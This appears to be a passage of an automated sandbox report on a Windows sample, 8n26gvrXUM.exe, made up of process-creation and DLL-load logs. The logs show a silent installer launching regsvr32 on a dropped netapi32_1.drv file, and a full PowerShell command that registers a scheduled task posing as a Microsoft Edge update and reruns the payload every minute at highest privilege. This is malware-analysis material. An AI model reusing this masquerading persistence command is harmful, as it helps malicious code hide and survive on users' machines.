      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"Jump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: explorerframe.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: sfc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptnet.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: webio.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: cabinet.dll
      Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
